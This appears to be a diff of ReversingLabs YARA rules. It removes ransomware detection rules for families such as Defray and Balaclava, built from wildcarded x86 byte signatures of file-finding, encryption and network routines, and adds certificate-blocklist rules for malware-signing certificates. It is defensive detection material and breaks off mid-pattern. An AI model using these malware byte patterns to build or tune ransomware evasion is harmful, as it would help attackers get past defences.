?? ?? ?? 8D 45 ?? 50 57 57 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? - ?? ?? 57 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 8B F0 FF 15 ?? ?? ?? ?? 57 FF - 75 ?? FF 15 ?? ?? ?? ?? 85 F6 74 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 33 C0 40 - EB ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E - 5B 8B E5 5D C3 - } - $find_files_p1 = { - 53 55 56 8B 74 24 ?? 8B EA 57 8B F9 6A ?? 83 26 ?? 58 66 89 44 6F ?? 8D 5F ?? 33 C0 - 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 53 89 44 24 ?? FF D0 33 C9 66 89 - 4C 6F ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 39 4F ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 - F8 ?? 0F 85 ?? ?? ?? ?? 8D 46 ?? 50 6A ?? 8D 4E ?? 51 8D 56 ?? 52 8D 46 ?? 50 6A ?? - 6A ?? 8D 5F ?? 53 FF 15 ?? ?? ?? ?? F7 D8 1B C0 83 C0 ?? 89 06 74 ?? 8B CB E8 ?? ?? - ?? ?? 85 C0 74 ?? 6A ?? 58 66 89 44 6F ?? 33 C0 66 89 44 6F ?? 8D 87 ?? ?? ?? ?? 50 - 53 FF 54 24 ?? 33 C9 66 89 4C 6F ?? 83 F8 ?? 75 ?? 39 0E 74 ?? 51 FF 76 ?? FF 76 ?? - FF 76 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 3E ?? 74 ?? FF 76 ?? FF 15 ?? ?? ?? ?? - 83 26 ?? 83 C8 ?? 5F 5E 5D 5B C3 - } - $find_files_p2 = { - 55 8B EC 83 E4 ?? 83 EC ?? 53 55 56 8B F1 57 FF 46 ?? 8D 7E ?? 8B 07 8D 5E ?? 89 44 - 24 ?? 8B 46 ?? 53 89 07 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 8B D0 8B CE E8 - ?? ?? ?? ?? 8B E8 59 83 FD ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? 53 8D 86 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? F6 03 ?? 74 ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB - ?? 8D 86 ?? ?? ?? ?? 50 8B 44 24 ?? 05 ?? ?? ?? ?? 8D 04 46 50 FF 15 ?? ?? ?? ?? FF - 76 ?? 57 6A ?? FF 16 83 C4 ?? 85 C0 74 ?? 53 55 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 55 FF - 15 ?? ?? ?? ?? 83 7E ?? ?? 8D 5E ?? 74 ?? 83 7C 24 ?? ?? 74 ?? 6A ?? FF 74 24 ?? FF - 74 24 ?? FF 74 24 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 7C 24 ?? ?? 74 ?? FF 74 24 - ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 33 C0 89 0F 40 5F 5E 5D 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "GERMES, OOO" and (pe.signatures[i].serial=="00:90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9" or pe.signatures[i].serial=="90:e3:3c:10:68:f5:49:13:31:5b:6c:e9:31:11:41:b9") and 1487635200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_3F15C3 : INFO FILE { meta: - description = "Yara rule that detects Defray ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2" - date = "2020-07-15" - modified = "2020-07-15" + id = "10bee456-21c0-51a0-988b-43daf65e596b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15518-L15534" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "03ea946fa99ed7a6ab23cb26dbf514b6c062d63371c9e2a5ddf999acd1954955" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Defray" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33 - F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 - C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D - BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ?? - ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? - 83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? - 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6 - EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B - 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 - 85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B - 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF - ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07 - 8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? - 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3 - A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ?? - ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ?? - ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 - ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $find_special_folders = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 - ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? - ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68 - ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D - BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF - D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 - C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B - 47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF - ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5 - 66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B - 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ?? - ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 - 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ?? - ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? - 85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85 - FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 - 57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D - 41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53 - FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD - 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_1 = { - 55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 - ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50 - 57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D - ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E - 57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB - ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2 - } - $encrypt_files_2_p1 = { - 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ?? - F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50 - 68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 - C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ?? - 59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ?? - ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50 - 56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? - ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? - FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9 - ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B - } - $encrypt_files_2_p2 = { - B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ?? - 8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85 - ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 - 53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B - 95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 - ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38 - 47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7 - 7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D - 85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 - } - $encrypt_files_2_p3 = { - 85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ?? - ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ?? - 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 - ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ?? - E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B - F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 - 59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85 - ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B C7 E8 ?? ?? ?? ?? C3 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($find_special_folders) and ($encrypt_files_1) and ( all of ($encrypt_files_2_p*)) and ($remote_connection) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Certified Software" and pe.signatures[i].serial=="3f:15:c3" and 1110577130<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Balaclava : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_285Eccbd1D0000E640B84307Ef88Cd9F : INFO FILE { meta: - description = "Yara rule that detects Balaclava ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1a17f2e8-f161-55bc-b44e-f8f47ebd9869" - date = "2020-10-01" - modified = "2020-10-01" + id = "4dc1523f-edc8-52e2-99aa-7389c0eb5e54" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Balaclava.yara#L1-L113" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "01b43e6ea7ceebdbdda7e1f7c5bd2439a460b8aed4a1837755fa3679e9893ff3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15536-L15552" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "267df1c327b65938b2b82a53ec8345290659560c69c9a70f2866fe7bd73513a7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Balaclava" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 55 8B EC 83 EC ?? 53 56 8B 75 ?? 33 D2 57 6A ?? 5B 8B 7E ?? 89 55 ?? 8D 4F ?? 66 8B - 07 03 FB 66 3B C2 75 ?? 2B F9 B9 ?? ?? ?? ?? D1 FF E8 ?? ?? ?? ?? 50 FF 76 ?? 89 45 - ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B - 45 ?? 83 C0 ?? 89 45 ?? 8B D8 33 D2 8D 4B ?? 66 8B 03 83 C3 ?? 66 3B C2 75 ?? 2B D9 - D1 FB 8D 04 3B 3D ?? ?? ?? ?? 7C ?? 8D 04 45 ?? ?? ?? ?? 50 39 56 ?? 74 ?? FF 76 ?? - 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 52 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? - ?? ?? 39 46 ?? 74 ?? 89 46 ?? 8B 46 ?? 33 C9 66 89 0C 78 8B 55 ?? F7 02 ?? ?? ?? ?? - 0F 85 ?? ?? ?? ?? 33 D2 8B C2 6A ?? 89 45 ?? 59 89 4D ?? 3B C1 7F ?? 03 C1 8B 4D ?? - 99 2B C2 D1 F8 89 45 ?? 8B 14 85 ?? ?? ?? ?? 66 8B 01 66 3B 02 75 ?? 66 85 C0 74 ?? - 66 8B 41 ?? 66 3B 42 ?? 75 ?? 83 C1 ?? 83 C2 ?? 66 85 C0 75 ?? 33 D2 8B C2 EB ?? 1B - C0 83 C8 ?? 33 D2 85 C0 0F 84 ?? ?? ?? ?? 79 ?? 8B 4D ?? 8B 45 ?? 49 EB ?? 8B 45 ?? - 8B 4D ?? 40 89 45 ?? EB ?? 8B 45 ?? F6 00 ?? 0F 84 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? - 50 8B 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 4E ?? 83 C4 ?? 8B 46 ?? - 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 - ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7E ?? ?? 74 - ?? 83 7E ?? ?? 7E ?? FF 76 ?? 8B 4E ?? FF 76 ?? E8 ?? ?? ?? ?? 59 59 8B 4E ?? 8D 14 - } - $find_files_p2 = { - 3B A1 ?? ?? ?? ?? 56 89 44 51 ?? 66 A1 ?? ?? ?? ?? 66 89 44 51 ?? FF 46 ?? E8 ?? ?? - ?? ?? FF 4E ?? E9 ?? ?? ?? ?? 39 56 ?? 0F 85 ?? ?? ?? ?? 8D 04 5D ?? ?? ?? ?? 50 8B - 46 ?? FF 75 ?? 8D 04 78 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 5E ?? 83 C4 ?? 8B CB B8 ?? ?? - ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? - 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B CB 8D - 51 ?? 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 F9 ?? 72 ?? 8B CB 8D 51 ?? - 66 8B 01 83 C1 ?? 66 3B 45 ?? 75 ?? 2B CA D1 F9 83 C1 ?? 68 ?? ?? ?? ?? 8D 04 4B 50 - FF 15 ?? ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 A8 ?? 74 ?? 83 E0 ?? - 50 FF 76 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 FF - 15 ?? ?? ?? ?? EB ?? 85 C0 75 ?? 6A ?? 53 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0D ?? - ?? ?? ?? 6A ?? 58 3B C8 A1 ?? ?? ?? ?? 74 ?? 83 F8 ?? 74 ?? FF 76 ?? A1 ?? ?? ?? ?? - 33 D2 6A ?? 03 C1 59 F7 F1 FF 34 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 05 ?? ?? ?? ?? - FF 05 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 46 ?? 6A - ?? 59 66 89 4C 78 ?? 33 C9 8B 46 ?? 66 89 0C 78 FF 75 ?? 8B 5D ?? 53 FF 15 ?? ?? ?? - ?? 85 C0 74 ?? 8B 45 ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 5D ?? 33 FF 39 7E ?? - 75 ?? 89 3E 53 FF 15 ?? ?? ?? ?? 8B DF 8B 4D ?? E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 - 5D C2 - } - $encrypt_files_p1 = { - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 55 ?? 8B C1 89 45 ?? C7 45 ?? ?? ?? - ?? ?? 33 F6 89 75 ?? 83 4D ?? ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 - ?? 56 68 ?? ?? ?? ?? 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? - 83 FB ?? 74 ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 0B 45 ?? 74 ?? - 8B FE EB ?? 33 FF 47 89 7D ?? 85 FF 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 - 45 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? FF 75 ?? FF D0 8B C8 A1 ?? ?? ?? ?? EB ?? 8B - 